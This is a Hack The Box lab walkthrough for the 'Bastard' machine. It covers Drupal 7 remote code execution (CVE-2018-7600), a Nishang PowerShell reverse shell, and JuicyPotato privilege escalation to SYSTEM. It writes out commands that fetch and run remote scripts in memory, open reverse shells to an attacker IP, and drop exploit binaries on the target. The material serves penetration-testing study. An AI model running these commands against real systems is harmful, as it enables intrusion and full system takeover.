Hack The Box

HackTheBox “Bastard” Walkthrough

In this walkthrough, we delve into the HackTheBox machine named “Bastard.” By exploiting the Drupal 7 vulnerability (CVE-2018–7600), we gain command execution. Afterwards, we establish a reverse shell and showcase…

HackTheBox “Bastard” Walkthrough, figure 1

In this walkthrough, we delve into the HackTheBox machine named “Bastard.” By exploiting the Drupal 7 vulnerability (CVE-2018–7600), we gain command execution. Afterwards, we establish a reverse shell and showcase the privilege escalation exploit known as SeImpersonatePrivilege (potato attack).

Let’s get started!🚀

Recon & Enumeration

Let’s use nmap to scan for open ports and services:

HackTheBox “Bastard” Walkthrough, figure 2

We see the presence of Drupal 7. To determine the exact version, we can leverage the changelog file.

Let’s see what information the browser will display to us.

HackTheBox “Bastard” Walkthrough, figure 3

Furthermore, based on the page source code, we can confirm that it is Drupal 7.

HackTheBox “Bastard” Walkthrough, figure 4

We will now conduct a searchsploit for known exploits targeting Drupal version 7.

HackTheBox “Bastard” Walkthrough, figure 5

To refine the results and discover a more suitable exploit, I will search on Google.

HackTheBox “Bastard” Walkthrough, figure 6

Upon testing multiple listed exploits, I determined that the one by pimps was the most effective. You can find it here.

I proceeded to copy the RAW script and saved it as “drupal.py.”

HackTheBox “Bastard” Walkthrough, figure 7

We download it to our attack box.

HackTheBox “Bastard” Walkthrough, figure 8

The script is straightforward. You only need to provide the command to execute and the target (website). It will exploit the service and provide the command’s output as a result.

HackTheBox “Bastard” Walkthrough, figure 9

I will now obtain a reverse shell on the target.

To achieve this, I will utilize the “Invoke-PowerShellTcp.ps1” script from Nishang Scripts, which can be found here.

After acquiring a copy of the script on my attacker machine, I placed it in my working directory and added the following command at the end:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4343
HackTheBox “Bastard” Walkthrough, figure 10

Next, we run an HTTP server within the working directory of our attack box.

HackTheBox “Bastard” Walkthrough, figure 11

We initiate a netcat listener on port 4343 to capture the incoming shell.

HackTheBox “Bastard” Walkthrough, figure 12

We execute the command below to download and execute the script directly into memory:

python3 drupal.py -c "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.8:8080/Invoke-PowerShellTcp.ps1')" http://10.10.10.9
HackTheBox “Bastard” Walkthrough, figure 13

The script file has been successfully downloaded from our attack box.

HackTheBox “Bastard” Walkthrough, figure 14

Consequently, we establish a shell on our listener.

HackTheBox “Bastard” Walkthrough, figure 15

After gaining a shell on the target box, I proceeded to conduct manual enumeration, commencing with gathering system information.

HackTheBox “Bastard” Walkthrough, figure 16

The obtained information reveals valuable details. Firstly, the OS is Windows Server 2008 R2 without any installed hotfixes, indicating vulnerability to a kernel exploit. Moreover, it confirms that the host operates on a 64-bit system, which is pertinent when utilizing tools.

Subsequently, I proceeded to collect information about the current user’s privileges using the following command:

HackTheBox “Bastard” Walkthrough, figure 17

The finding of enabled SeImpersonatePrivilege implies that I can leverage a potato attack to escalate privileges to SYSTEM.

HackTheBox “Bastard” Walkthrough, figure 18

Obtain a copy of JuicyPotato.exe from this GitHub repository here, ensure to acquire the 64-bit version of the executable.

HackTheBox “Bastard” Walkthrough, figure 19

Meanwhile, our HTTP server in the working directory of our attacking box remains operational.

HackTheBox “Bastard” Walkthrough, figure 20

Create a temp directory within the C partition.

HackTheBox “Bastard” Walkthrough, figure 21

We proceed to download JuicyPotato onto the target machine.

(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.4:8080/JuicyPotato.exe', 'C:\temp\JuicyPotato.exe')
HackTheBox “Bastard” Walkthrough, figure 22

Let’s execute the exploit and see the outcome.

HackTheBox “Bastard” Walkthrough, figure 23

In order to run the tool successfully, we require a port number for the COM server and a valid CLSID. There are two options: either use the provided list by the tool authors corresponding to the system version or execute the following PowerShell script to extract the CLSID of the current system:

GetCLSID.ps1 script

I will use a batch script to download the Nishang PowerShell script. On the attacker machine, use the following command to craft a batch script:

echo "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.5:8080/Invoke-PowerShellTcp.ps1')" > shell.bat
HackTheBox “Bastard” Walkthrough, figure 24

Download the batch script onto the target box using the command below.

(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5:8080/shell.bat', 'C:\temp\shell.bat')
HackTheBox “Bastard” Walkthrough, figure 25

The setup is complete, and we are ready to proceed with the exploit. In case the default CLSID fails, the exploit publisher has provided a list of alternative CLSIDs for testing, available here.

Considering that the target system runs Windows Server 2008 R2, the following CLSIDs are applicable:

HackTheBox “Bastard” Walkthrough, figure 26

Let’s proceed with using the first CLSID from the list.

C:\temp\JuicyPotato.exe -l 4343 -p C:\temp\shell.bat -t * -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"
HackTheBox “Bastard” Walkthrough, figure 27

Returning to the listener, I successfully obtained a SYSTEM shell.

HackTheBox “Bastard” Walkthrough, figure 28

Cheers.